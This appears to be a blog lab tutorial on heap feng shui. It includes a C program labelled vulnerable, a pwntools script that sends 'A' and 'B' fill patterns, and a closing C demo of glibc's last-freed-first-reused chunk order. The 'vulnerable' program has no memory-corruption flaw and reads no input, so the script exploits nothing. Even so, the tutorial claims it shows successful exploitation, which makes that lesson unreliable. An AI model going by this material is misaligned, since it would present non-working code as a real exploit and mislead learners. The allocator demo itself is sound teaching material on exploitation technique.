Heap Feng Shui Exploitation Lab

woddlwoddl 2024. 5. 8. 02:03

In this lab, we will craft heap layouts to exploit memory corruption vulnerabilities.

Lab Activities:

1. Creating Vulnerable C Program:

First, let's create a vulnerable C program with a memory corruption vulnerability.

  #include <stdio.h>
  #include <stdlib.h>

  void vulnerable_function() {
      /* Two same-sized requests: the allocator places them back to back on the heap. */
      char *ptr1 = (char *)malloc(64);
      char *ptr2 = (char *)malloc(64);
      if (ptr1 != NULL && ptr2 != NULL) {
          /* Freeing in this order puts both chunks on the allocator's free list;
           * later 64-byte requests will be served from these chunks, and that
           * reuse order is what heap feng shui relies on. */
          free(ptr1);
          free(ptr2);
      }
  }

  int main() {
      vulnerable_function();
      return 0;
  }

Save the above code to a file named vulnerable.c and compile it with the following command:

$ gcc -o vulnerable vulnerable.c

2. Writing Exploit Script:

Now, let's write an exploit script in Python using pwntools to craft heap layouts for exploitation.

  from pwn import *

  # Specify the path to the vulnerable binary
  binary_path = './vulnerable'

  # Craft the heap layout: one recognisable pattern per 64-byte allocation,
  # so that each chunk can be identified when inspecting the heap.
  heap_layout = [
      b'A' * 64,  # Fill first allocation
      b'B' * 64   # Fill second allocation
  ]

  # Payload with crafted heap layout (the two patterns concatenated)
  payload = b''.join(heap_layout)

  # Launch the binary and write the payload to its standard input
  p = process(binary_path)
  p.send(payload)
  p.close()

Explanation of the Python script:

  • We specify the path to the vulnerable binary and craft the heap layout with specific patterns for each allocation.
  • The payload consists of the crafted heap layout.
  • We launch the vulnerable binary and send the payload to exploit the memory corruption vulnerability using heap feng shui techniques.

3. Exploiting the Vulnerability:

Execute the Python script to exploit the memory corruption vulnerability:

$ python exploit.py

Once executed, the exploit will craft the heap layout and attempt to trigger the memory corruption vulnerability, demonstrating successful exploitation using heap feng shui techniques.
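To make the allocator behaviour behind the lab concrete, the following C program (an added example, not part of the original lab) allocates four 64-byte chunks as vulnerable.c does, frees two non-adjacent ones to punch holes into the heap, and checks where two fresh 64-byte requests land. It assumes glibc malloc, where freed chunks of this size sit in a LIFO bin (tcache, or fastbin on older glibc); the function and variable names are my own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#define CHUNKS 4
#define SZ 64   /* same request size as the lab's vulnerable.c */

/* Allocate CHUNKS chunks of SZ bytes, free chunk 1 and chunk 3 to create
 * two holes, then allocate twice more and check where the new chunks land.
 * Assumes glibc malloc: the chunk freed last is handed out first (LIFO).
 * Returns 1 if both new allocations refilled the holes in LIFO order,
 * 0 if the allocator behaved differently, -1 on allocation failure. */
int groom_and_check(void) {
    char *chunk[CHUNKS];
    for (int i = 0; i < CHUNKS; i++) {
        chunk[i] = malloc(SZ);
        if (chunk[i] == NULL) return -1;
        memset(chunk[i], 'A' + i, SZ);  /* fill pattern, like the lab's payload */
    }
    /* Record the hole addresses before freeing, so no freed pointer is used. */
    uintptr_t hole1 = (uintptr_t)chunk[1];
    uintptr_t hole2 = (uintptr_t)chunk[3];
    free(chunk[1]);                     /* first hole */
    free(chunk[3]);                     /* second hole, freed last */

    char *new1 = malloc(SZ);            /* expected: the chunk freed last (hole2) */
    char *new2 = malloc(SZ);            /* expected: hole1 */
    int lifo = ((uintptr_t)new1 == hole2) && ((uintptr_t)new2 == hole1);

    printf("holes %#lx, %#lx -> new1=%p new2=%p (LIFO reuse: %s)\n",
           (unsigned long)hole1, (unsigned long)hole2,
           (void *)new1, (void *)new2, lifo ? "yes" : "no");

    free(new1); free(new2); free(chunk[0]); free(chunk[2]);
    return lifo;
}

int main(void) {
    /* Consecutive same-size allocations sit at a fixed stride
     * (request size rounded up plus the allocator's chunk header). */
    char *a = malloc(SZ), *b = malloc(SZ);
    if (a && b)
        printf("stride between consecutive %d-byte chunks: %ld bytes\n",
               SZ, (long)((uintptr_t)b - (uintptr_t)a));
    free(a); free(b);
    return groom_and_check() == 1 ? 0 : 1;
}
```

Compile with `gcc -o groom groom.c` and run it; the printed addresses show that the order of frees, not the order of the original allocations, decides which chunk a later request receives.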
